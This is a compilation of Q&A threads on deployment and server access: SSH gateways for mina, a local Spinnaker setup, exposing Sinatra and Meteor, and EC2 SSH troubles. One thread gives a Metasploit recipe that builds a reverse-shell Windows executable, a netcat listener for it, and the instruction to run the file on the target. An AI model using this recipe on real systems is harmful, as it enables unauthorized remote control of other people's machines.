mina gem deploy through gateway - ruby

I am using the mina gem to deploy.
I have to go through a gateway in order to connect to my server.
I know that capistrano enables it.
Does anyone know this config in mina?

I don't believe mina supports this; certainly, the source code doesn't indicate such an option. I was experimenting with using the set :ssh_options, '' syntax, but mina appends -t to the end of the command chain, which then gets sent to the wrong server. Considered changing the mina code, but it's probably simpler to shift the gateway connection to your local ssh client itself, and possibly to use the set :forward_agent, true command. To do so, you'd set something like this in your ~/.ssh/config:
Host finaldestination.example.com
    ProxyCommand ssh user@gateway.example.com nc %h 22
    ForwardAgent yes
Testing using my localhost as a gateway seems to show this as workable.
Hope this helps - although I realise it isn't exactly what you were asking. :)

Related

How to spin up spinnaker locally for the first time

How to spin up a local version of Spinnaker? This has been answered and addressed in detail here.
https://github.com/spinnaker/spinnaker/issues/1729
Ok, so I got it to work, but not without your valuable help! @lwander
So I'll leave the steps here for posterity.
Each line is a separate command in the command line. I've installed this on a virtual machine with a freshly installed Ubuntu 14.04 copy with nothing else than SSH. Then SSH in as root; you will need to configure sshd on your console to allow root access.
https://askubuntu.com/questions/469143/how-to-enable-ssh-root-access-on-ubuntu-14-04
curl -O https://raw.githubusercontent.com/spinnaker/halyard/master/install/stable/InstallHalyard.sh
created a user account member of the adm and sudo groups (is this necessary???)
then Install Halyard:
bash InstallHalyard.sh
Verify that HAL is installed and validate its version.
hal -v
Tell Hal that the deployment type will be as a local instance (this will publish all services in localhost which will be tricky later in order to access them, but I have a turnaround so keep reading)
hal config deploy edit --type localdebian
Hal will complain that a version has not been selected, just tell HAL which version:
hal config version edit --version 1.0.0
Then tell HAL which storage you are going to use; in my case, since it is local, I want to use redis.
hal config storage edit --type redis
So now we need to add a cloud provider to HAL, we use AWS so we add it like this:
hal config provider aws edit --access-key-id XXXXXXXXXXXXXXXXXXXX --secret-access-key
I created a user on AWS and added access keys to the user inside IAM on the user security credentials tab. Obviously my access-key-id is not XXXXXXXXXXXXXXXXXXXX, I edited it. You do not need to enter the secret-access-key because the command will prompt for it.
Then you need to create a username relative or that will only concern your spinnaker installation; however, this will get related to your AWS Account-ID, so in MY spinnaker local installation I chose the username spinnakermaster; you should choose yours! And my AWS Account ID is not YYYYYYYYYYYY, I've edited it too.
All the configurations and steps that you'll need to do inside AWS for this to work are really well documented here:
https://www.spinnaker.io/setup/providers/aws/
And to tell HAL of the above, here's the command:
hal config provider aws account add spinnakermaster --account-id YYYYYYYYYYYY --assume-role role/spinnakerManaged
And after all that and if everything went according to plan we can ask HAL to deploy our brand new spinnaker installation.
hal deploy apply
It will begin a long installation downloading and configuring all the services.
Once it has finished you may do whatever you like but in my case I created a monitoring script like the one described here:
https://github.com/spinnaker/spinnaker/issues/854
Which can be launched on a recursive manner as this:
watch -n1 spinnaker-status.sh
or until you ctrl+C it!
Then, to be able to access your local VM spinnaker copy, you can either set up a reverse proxy with the proxy server of your choice to forward all the requests to localhost, or you can simply ssh the SH** out of this, redirecting the ports:
ssh root@ZZZ.ZZZ.ZZZ.ZZZ -L 9000:127.0.0.1:9000 -L 8084:127.0.0.1:8084 -L 8083:127.0.0.1:8083 -L 7002:127.0.0.1:7002 -L 8087:127.0.0.1:8087 -L 8080:127.0.0.1:8080 -L 8088:127.0.0.1:8088 -L 8089:127.0.0.1:8089
Where obviously the ZZZ.ZZZ.ZZZ.ZZZ is not an actual IP address.
And finally to begin having fun with this cutie you have to go to your browser of choice and type into the address bar:
http://127.0.0.0:9000
Hope this helps and saves some time for everybody!
Cheers.
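
The port-forwarding step from the post above, as an added example that is not part of the original post: a shell helper that builds the same ssh -L arguments but pins every local listener to 127.0.0.1, validates the port values, and adds -N and ExitOnForwardFailure. The function names and the user@host placeholder are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: build the ssh port-forward command from the post with each
# local listener pinned to loopback. Function names are hypothetical.

# Ports forwarded in the post (Spinnaker services published on localhost).
SPINNAKER_PORTS="9000 8084 8083 7002 8087 8080 8088 8089"

# forward_args PORT... -> prints "-L 127.0.0.1:P:127.0.0.1:P ..." or fails.
forward_args() {
  local out="" p
  for p in "$@"; do
    # Accept only 1-5 decimal digits, so a malformed value can never reach
    # ssh as an extra option or as a different forward specification.
    case "$p" in
      ''|*[!0-9]*|??????*) echo "invalid port: $p" >&2; return 1 ;;
    esac
    if [ "$p" -lt 1 ] || [ "$p" -gt 65535 ]; then
      echo "port out of range: $p" >&2; return 1
    fi
    # Explicit bind address: the listener stays on loopback even when
    # GatewayPorts is enabled in the client configuration.
    out="$out -L 127.0.0.1:$p:127.0.0.1:$p"
  done
  printf '%s\n' "${out# }"
}

# tunnel_command USER@HOST PORT... -> prints the full ssh command line.
tunnel_command() {
  local target="$1" args
  shift
  # A target starting with "-" would be parsed by ssh as an option.
  case "$target" in
    ''|-*) echo "invalid target: $target" >&2; return 1 ;;
  esac
  args="$(forward_args "$@")" || return 1
  # -N: tunnel only, no remote shell. ExitOnForwardFailure: abort rather than
  # run with a forward missing because a local port was already in use.
  printf 'ssh -N -o ExitOnForwardFailure=yes %s %s\n' "$args" "$target"
}

# Placeholder host, as in the post; prints the command instead of running it.
tunnel_command "user@ZZZ.ZZZ.ZZZ.ZZZ" $SPINNAKER_PORTS
```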

Standalone multi/handler reverse_tcp

Sorry for my English.
Using metasploit I generated an exploit for windows 7 with windows/shell/reverse_tcp payload.
Then I waited for the connection using msfconsole:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
I am successfully connected to command line of windows.
However I need to expect connection without using metasploit. I found how to create standalone module, but it was only for an exploit.
I need standalone multi/handler reverse_tcp or simply the code which listens to a certain port and then gives access to command line.
I don't really know what your constraints/restrictions are.
My guess is that you want to "receive shells" on a computer without metasploit installed on it. If that's the case, you could use msfd (metasploit daemon installed on a different computer) or simply netcat, socat, ...
What do you think of this:
listening with netcat on 192.168.1.2
# nc -l -p 4444
Using a shell_reverse_tcp instead
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
Execute darkbird.exe on the target

Can't access sinatra server from other computers

I am running a sinatra server with shotgun that returns a hello world when request GET in the root (typical tutorial) and works perfectly on my computer. I could only access it from localhost:9393, and then I ran it with -o 0.0.0.0 and could access it as IP:9393, but still only from the computer where the server was running.
How can I access the server from other computers? I already tried bind 0.0.0.0 and environment production.
Thanks in advance.
A bit more information is needed, like the OS that you are running and if you have made sure that any local firewalls are not blocking your traffic. I see that you marked this with the "Shotgun" tag which tells me that you are running on a *nix system as Shotgun uses forks and windows doesn't support them.
Check your iptables and see if you got anything in there. :)
iptables -nvL -t nat --line-numbers
iptables -nvL --line-numbers
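
An added example, not part of the original answer: before reading the iptables rules, it helps to confirm which address the server is actually bound to, since a loopback-only listener looks the same from outside as a blocked port. The helper classifies a port from `ss -ltn` output; the sample output and the function name bind_scope are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: classify how a TCP port is bound, from `ss -ltn` output.

# Constructed sample of `ss -ltn` output (not taken from the original post).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:9393      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      128    [::]:8080           [::]:*'

# bind_scope PORT   (reads `ss -ltn` output on stdin)
# Prints one of: loopback, all-interfaces, specific:<addr>, not-listening.
bind_scope() {
  awk -v port="$1" '
    $1 == "LISTEN" {
      # The port is whatever follows the last ":" of the local address,
      # which also handles bracketed IPv6 forms such as [::]:8080.
      n = split($4, parts, ":")
      if (parts[n] != port) next
      addr = substr($4, 1, length($4) - length(parts[n]) - 1)
      if (addr == "127.0.0.1" || addr == "[::1]")
        s = "loopback"          # reachable only from the host itself
      else if (addr == "0.0.0.0" || addr == "*" || addr == "[::]")
        s = "all-interfaces"    # reachable remotely unless a firewall drops it
      else
        s = "specific:" addr
      # If several listeners share the port, report the widest exposure.
      if (result == "" || s == "all-interfaces") result = s
    }
    END { print (result == "" ? "not-listening" : result) }
  '
}

# On a live host: ss -ltn | bind_scope 9393
printf '%s\n' "$SAMPLE_SS" | bind_scope 9393
```

A result of loopback means the bind option did not take effect and the firewall is not yet the problem; all-interfaces means the listener is fine and the iptables output above is the next thing to read.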

How to control where Meteor runs

I'm installing Meteor (framework) on my AWS EC2 (micro) instance and followed the instructions and after creating a test project I ran meteor on that directory giving me the expected
[[[[[ /var/www/html/meteortest ]]]]]
Running on: http://localhost:3000/
But I can't navigate to my server's localhost in my browser to see the hello world example project. Is there a way I can make meteor work on something like :
http://mydomain.com/meteortest/
or
http://mydomain.com/meteortest:3000
The way that Meteor sets the ROOT URL is by using an environment variable called ROOT_URL:
http://docs.meteor.com/#meteor_absoluteurl
So you could run your Meteor instance like so: ROOT_URL="http://mydomain.com/" meteor --port 80
However, if you want to have the meteor instance served from a folder (like http://mydomain.com/meteortest), you will have to use nginx to forward ports (see Tyr's example) but replace the line:
location / {
with:
location /meteortest {
and change your ROOT_URL appropriately. If you still can't access your domain from outside, you may have not set your security groups properly for EC2. You have to open up port 80. More information on how to do this can be found here: http://docs.amazonwebservices.com/AWSEC2/latest/UserGuide/using-network-security.html
You can setup nginx to proxy port 3000 to your domain. Something like:
server {
    listen 80;
    server_name meteortest.mydomain.com;
    access_log /var/log/nginx/meteortest.access.log;
    error_log /var/log/nginx/tmeteortest.error.log;
    location / {
        proxy_pass http://localhost:3000;
        include /etc/nginx/proxy_params;
    }
}
Please see http://wiki.nginx.org/HttpProxyModule for more information.
However, running meteor on port 3000 is a development environment. If you want to use it in production, please run "meteor bundle", and then follow the README inside the generated tarball.
I think the problem is that port 3000 is likely blocked by amazon's firewall. You could look at opening it up, try Tyr's solution, or try just running meteor with
meteor --port 80
You may need root permissions (i.e. sudo) to do this.
Running directly on port 80 would require root privileges, which you don't really want your web server to run as -- starting it as root and deescalating to a regular user is possible, but not really ideal as well, as you may find that a programming bug at some time forgets to deescalate privs and you will not see any errors from that.
In many cases, I don't really want/need to run a load balancer to use multiple cores, especially if I'm running on AWS single core t1 or t2 instance types, which I just scale out as I need them -- hence the best advice I have seen is to simply use the Linux kernel's ability to do port forwarding, mapping port 80 to port 3000, like this:
$ sudo iptables -A PREROUTING -t nat -i eth0 -p tcp \
--dport 80 -j REDIRECT --to-port 3000
Nice and easy and nothing else to do -- and super efficient at the same time as no extra processes are involved in serving the requests.

Help Accessing Amazon EC2 Instance

Trying to set up first EC2 instance for simple (currently) php app, using osx 10.6. When I try to access my new instance in the command line I can only get ssh: connect to host xx.xxx.xxx.xxx port 22: Operation timed out.
I'm typing this at command line:
ssh -i <MYPEMNAME>.pem ec2-user@<PRIVATEIP/PUBLICDNS/ELASTICIP>
I have this as a security rule in the management console:
rule name: web_access
22(SSH) 0.0.0.0
80(HTTP) 0.0.0.0
I have ssh completely open just to test this, I'll get a more appropriate ip when it works.
I created an elastic IP, which was one option I tried after 'ec2-user@...'
I also generated a .pem when I created the instance, which I have saved to a folder .ec2 on my machine, named as referenced in .pem above.
The management console says the instance is running. I think I'm just doing the ssh access wrong at this point.
any help tremendously appreciated!
thanks
Yeah, comments were pretty correct. It was an ssh issue and the main thing was that I was trying to add a custom security rule that allowed ssh but the default didn't, and for whatever reason the custom rule wasn't being applied, so I just edited the default rule to allow port 22 (ssh) and I was pretty much up and running. Also needed to run chmod. !! Anddd, if you add a new keypair like I did, you may need to go into the ssh/known_hosts file and delete reference to your old keypair. That was hanging me up for a while with an error about a middleman attack.
thanks
